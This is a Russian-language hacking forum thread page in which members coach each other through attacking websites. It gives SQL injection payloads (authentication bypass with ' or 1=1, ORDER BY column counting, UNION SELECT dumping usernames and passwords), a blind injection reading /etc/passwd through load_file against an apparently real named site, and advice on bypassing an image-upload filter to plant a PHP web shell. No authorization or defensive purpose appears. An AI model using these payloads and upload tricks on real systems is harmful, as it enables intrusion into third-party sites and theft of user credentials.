ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1211  
Старый 16.03.2008, 01:52
4y4o
Познающий
Регистрация: 22.01.2007
Сообщений: 40
Провел на форуме:
179857

Репутация: 4
По умолчанию

Цитата:
Сообщение от blackybr  
пошли два постзапроса и проверь. на ппример (поиграй с кавычкой и and/or)

POST /index.php?page=uvod HTTP/1.0

username=aqwerty&pass=11111' or 1=1/*&pass1=111111&b1=Ok

и

POST /index.php?page=uvod HTTP/1.0

username=aqwerty&pass=11111' or 2=1/*&pass1=111111&b1=Ok


и посмотри разные ли ответы сервера

ответы одинаковы. страница отобрадается как и отображалась
 
Ответить с цитированием

  #1212  
Старый 16.03.2008, 01:59
n0ne
Постоянный
Регистрация: 01.01.2007
Сообщений: 796
Провел на форуме:
2693408

Репутация: 861


По умолчанию

4y4o, тогда скорее всего скули нет
 
Ответить с цитированием

  #1213  
Старый 16.03.2008, 02:04
4y4o
Познающий
Регистрация: 22.01.2007
Сообщений: 40
Провел на форуме:
179857

Репутация: 4
По умолчанию

лана проехали. но дайте понять смысл. если параметры не верны страница должна отобразится с ошибкой, если верны то без. это означает что скуль есть. так? дальнейшие действия?
 
Ответить с цитированием

  #1214  
Старый 16.03.2008, 07:07
ZET36
Участник форума
Регистрация: 08.10.2007
Сообщений: 259
Провел на форуме:
500748

Репутация: 137
По умолчанию

4y4o дальше нужно подобрать количество полей
например

ввв.сайт.ру/скрипт.пхп?переменная=1+union+s elect+1,2,3,4,5,6/*

можно задать больше 6 . и если на странице отобразится скажем цифра 4 то значит отобразилось значение 4 поля(самый простой метод)

можно так же подобрать количество полей (лично я так подбираю) с помощью оператора order by

например

ввв.сайт.ру/скрипт.пхп?переменная=1+order+b y+3/*
если ошибки нет то полей больше трёх или три
берём например больше
ввв.сайт.ру/скрипт.пхп?переменная=1+order+b y+10/*
если ошибка есть то полей меньше 10
и так короче находи цифру с которой ошибки небудет но следущая цифра должна отображать ошибку
скажем нашли количество полей например оно равно 6
дальше проверяеш стоит ли фильтрация на какиенибуть символы задаём команду скажем узнать версию майскула
ввв.сайт.ру/скрипт.пхп?переменная=1+union+s elect+1,2,3,4,5,version(),7,8/*
если отобразилась версия то фильтрации нет если нет то попробуй закодировать эту команду скажем так
ввв.сайт.ру/скрипт.пхп?переменная=1+union+s elect+1,2,3,4,5,aes_decrypt(aes_encrypt(con cat(version()),1),1),7,8/*
отобразилась версия. дальше нужно узнать в какой таблице лежат данные юзерей (можно с помощью брутфорса, надо бы написать мне такой а хотя уже есть наверно)
узнали например имя этой таблицы polzovateli
и выводим логин и пароль первого пользователя(он в большинстве случаев админ)

ввв.сайт.ру/скрипт.пхп?переменная=1+union+s elect+1,2,3,5,concat(username,0x3a,password)+from+ polzovateli+limit+1,1/*
 
Ответить с цитированием

  #1215  
Старый 16.03.2008, 07:30
hiv
Новичок
Регистрация: 15.07.2007
Сообщений: 24
Провел на форуме:
593997

Репутация: 11
Отправить сообщение для hiv с помощью ICQ
По умолчанию

Вот запрос, судя по всему 3 таблицы :
http://city.ab.ru/index.php?pg=show&kat=-1+order+by+3/*
дальше
http://city.ab.ru/index.php?pg=show&kat=-1+union+select+1,2,3/*

You have an error in your SQL syntax near 'union select 1,2,3/*' at line 1

Копаем дальше... непонятно пока ничего

хех, версия мускла вроде как 3тья!!!!

что можно еще накопать ?
 
Ответить с цитированием

  #1216  
Старый 16.03.2008, 07:46
Scipio
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734

Репутация: 1917


Отправить сообщение для Scipio с помощью ICQ
По умолчанию

Цитата:
Сообщение от hiv  
хех, версия мускла вроде как 3тья!!!!

что можно еще накопать ?
Файлы можешь читать, так что скрипт пиши, ищи полезные файлы и читай

Код:
http://city.ab.ru/index.php?pg=show&kat=12%20and%20ascii(substring(load_file(0x2F6574632F706173737764),1,1))=35
больше ничего полезного имхо, т.к. кавычки экранируются
__________________
Карфаген должен быть разрушен...

Последний раз редактировалось Scipio; 16.03.2008 в 07:50..
 
Ответить с цитированием

  #1217  
Старый 16.03.2008, 16:24
MSDEN
Новичок
Регистрация: 07.05.2007
Сообщений: 12
Провел на форуме:
77696

Репутация: 1
По умолчанию

залил шелл на сайт через форму для загрузки изображений, но чтобы его залить пришлось расширение поменять на gif, а как php то теперь сделать? ((((
при переходе на изображение просто пустое окно огромного размера
 
Ответить с цитированием

  #1218  
Старый 16.03.2008, 16:29
iddqd
Banned
Регистрация: 19.12.2007
Сообщений: 924
Провел на форуме:
4192567

Репутация: 2145


По умолчанию

попробуй в конце урл добавить %00
или залей как .php.gif
 
Ответить с цитированием

  #1219  
Старый 16.03.2008, 16:40
MSDEN
Новичок
Регистрация: 07.05.2007
Сообщений: 12
Провел на форуме:
77696

Репутация: 1
По умолчанию

эхх нитак и нитак не получилось (((
после заливки там меняется название файла и поулчается то же самое blablabal.gif,
%00 тоже не помогло ( Всеравно спасибо
 
Ответить с цитированием

  #1220  
Старый 16.03.2008, 17:08
blackybr
♠ ♦ ♣ ♥
Регистрация: 18.05.2006
Сообщений: 1,828
Провел на форуме:
8042357

Репутация: 3742


Отправить сообщение для blackybr с помощью ICQ Отправить сообщение для blackybr с помощью AIM Отправить сообщение для blackybr с помощью Yahoo
По умолчанию

Цитата:
Сообщение от ZET36  
4y4o дальше нужно подобрать количество полей
например

ввв.сайт.ру/скрипт.пхп?переменная=1+union+s elect+1,2,3,4,5,6/*

можно задать больше 6 . и если на странице отобразится скажем цифра 4 то значит отобразилось значение 4 поля(самый простой метод)

можно так же подобрать количество полей (лично я так подбираю) с помощью оператора order by

например

ввв.сайт.ру/скрипт.пхп?переменная=1+order+b y+3/*
если ошибки нет то полей больше трёх или три
берём например больше
ввв.сайт.ру/скрипт.пхп?переменная=1+order+b y+10/*
если ошибка есть то полей меньше 10
и так короче находи цифру с которой ошибки небудет но следущая цифра должна отображать ошибку
скажем нашли количество полей например оно равно 6
дальше проверяеш стоит ли фильтрация на какиенибуть символы задаём команду скажем узнать версию майскула
ввв.сайт.ру/скрипт.пхп?переменная=1+union+s elect+1,2,3,4,5,version(),7,8/*
если отобразилась версия то фильтрации нет если нет то попробуй закодировать эту команду скажем так
ввв.сайт.ру/скрипт.пхп?переменная=1+union+s elect+1,2,3,4,5,aes_decrypt(aes_encrypt(con cat(version()),1),1),7,8/*
отобразилась версия. дальше нужно узнать в какой таблице лежат данные юзерей (можно с помощью брутфорса, надо бы написать мне такой а хотя уже есть наверно)
узнали например имя этой таблицы polzovateli
и выводим логин и пароль первого пользователя(он в большинстве случаев админ)

ввв.сайт.ру/скрипт.пхп?переменная=1+union+s elect+1,2,3,5,concat(username,0x3a,password)+from+ polzovateli+limit+1,1/*

бред, если считать что у него скуль в авторизации. где оно по твоему выводить будет?
только посимвольный перебор
__________________
Привет! Меня зовут Джордж, и я хотел бы рассказать вам про реинкарнацию (ц) 2x2
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ